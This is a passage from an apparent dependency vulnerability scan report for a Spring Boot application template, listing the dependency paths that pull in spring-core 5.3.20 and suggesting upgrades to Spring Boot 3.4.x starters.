  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.0.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.4.10.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
